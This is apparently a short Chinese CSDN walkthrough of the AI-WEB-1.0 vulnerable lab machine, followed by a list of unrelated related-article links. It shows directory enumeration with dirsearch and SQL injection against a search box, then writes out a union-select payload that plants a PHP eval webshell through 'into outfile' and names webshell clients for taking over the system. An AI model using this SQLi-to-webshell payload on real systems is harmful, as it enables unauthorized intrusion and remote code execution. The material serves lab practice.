CSDN AI-WEB-1.0 攻略

找到一个目标靶场的IP , 这里以172.16.1.98 为例

1、使用命令 /robots.txt 来确定目录

2、分别测试两个文件

均无法访问,可返回其根目录查询

3、到根目录,出现搜索框

4、输入ID为1

5、使用虚拟机kali的终端

搜索命令 dirsearch -u http://172.16.1.98/m3diNf0/

6、搜索文件 info.php

即可得到 WWW 所在的根目录

7、确定闭合方式 1'

8、确定字段

1' order by 3#

9、注入一句话"木马"

1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #

9、查看文件,木马是否注入成功

搜索 /s /up /sis.php

10、使用中国蚁键/中国菜刀等工具,进入该系统

++即可成功获取信息++

安全

网络安全人人有责,切勿知法犯法

相关推荐
郝YH是人间理想1 小时前
系统架构设计师案例分析题——web篇
前端·软件工程
Evaporator Core1 小时前
深入探索:Core Web Vitals 进阶优化与新兴指标
前端·windows
初遇你时动了情2 小时前
html js 原生实现web组件、web公共组件、template模版插槽
前端·javascript·html
数据与人工智能律师2 小时前
虚拟主播肖像权保护,数字时代的法律博弈
大数据·网络·人工智能·算法·区块链
Yushan Bai2 小时前
ORACLE RAC环境REDO日志量突然增加的分析
数据库·oracle
躺着听Jay2 小时前
Oracle-相关笔记
数据库·笔记·oracle
James. 常德 student2 小时前
网络安全知识点
安全·web安全·php
瀚高PG实验室2 小时前
连接指定数据库时提示not currently accepting connections
运维·数据库
QQ2740287562 小时前
Soundness Gitpod 部署教程
linux·运维·服务器·前端·chrome·web3
前端小崔2 小时前
从零开始学习three.js(18):一文详解three.js中的着色器Shader
前端·javascript·学习·3d·webgl·数据可视化·着色器